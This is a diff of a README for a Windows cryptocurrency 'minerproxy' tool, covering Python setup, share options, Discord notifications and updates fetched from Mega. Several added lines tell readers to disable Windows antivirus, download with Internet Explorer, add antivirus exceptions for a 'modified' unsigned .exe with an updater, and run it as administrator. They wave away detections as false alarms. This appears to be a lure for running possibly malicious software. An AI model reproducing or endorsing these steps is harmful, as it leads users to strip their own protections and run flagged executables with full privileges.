lolzminer123/minerproxy/README.md

 the ping is very low when i tested it it was 12ms 14ms on 2miners depending on what country your from.

 works on all windows
+Disable Antivirus windows secruity antivirus  download with internet explorer not chrome! before u proceed !  after installation

-please install python 10 upwards not sur if works on python 11 but may do but make sure u install requirements first otherwise proxy will fail i have inlcuded a prebuilt .exe ready for launch . right click run as administrator. todo
+please install python 10 upwards this can be downloaded from microsoft store or from https://www.python.org/downloads/release/python-3100/ not sure if works on python 11 but may do but make sure u install requirements first otherwise proxy will fail i have inlcuded a prebuilt .exe with updater ready for launch . right click run as administrator.

-add low share option incase a user wants low shares solo or both shares solo fyi works on shared or solo, solo is best :)
+added low share option incase a user wants low shares solo or both shares solo fyi works on shared or solo, solo is best :)

 just added discord feature for notifications, just add your discord username/handle with hashtags for notifications when block is found. and to alert when miner goes offline and largest share found.

-if ur av detects abnormal when downloading its bcuz its a modified .exe file so turn of av go to add acception then re-enable ur av some avs i have tested and nothing apart from 1 only bcuz its a modified .exe i found out today that the .exe needs to be signed a verified certificate and this will stop the antivirus alert which i will get done next week sometime.
+if ur av detects abnormal when downloading its bcuz its a modified .exe file so turn of av go to add acception click python file or the exe then re-enable ur av some avs i have tested and nothing apart from 1 only bcuz its a modified .exe i found out today that the .exe needs to be signed a verified certificate and this will stop the antivirus alert which i will get done next week sometime.

 added more updates you can download from mega launch the updateproxy then launche largeproxy